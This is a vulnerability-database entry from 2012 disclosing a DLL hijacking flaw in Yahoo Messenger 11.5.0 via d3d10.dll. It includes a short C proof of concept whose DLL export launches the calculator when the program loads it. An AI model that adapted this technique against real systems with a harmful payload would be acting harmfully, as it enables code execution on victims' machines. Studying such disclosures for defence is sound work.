yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit

2012.08.26
Credit: coolkaveh
Risk: Low
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Exploit Title: yahoo messenger 11.5.0 (d3d10.dll) DLL Hijacking Exploit Date: 2012-08-23 Author: coolkaveh coolkaveh () rocketmail com Https://twitter.com/coolkaveh Vendor Homepage: http://www.yahoo.com/ Version: 11.5.0228-us Tested on: windows XP Sp3 ENG Greets To Mohammad Morteza Sanaie sanaie.morteza () gmail com --------------------------------------------------------- # Vulnerable: yahoomessenger.exe --------------------------------------------------------- # Vulnerable extensions: .ymg --------------------------------------------------------- # Vulnerable Dll: d3d10.dll --------------------------------------------------------- #include <windows.h> #define DllExport __declspec (dllexport) DllExport void hook_startup() { exp(); } int exp() { WinExec("calc", 0); exit(0); return 0; }

References:

http://www.yahoo.com/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top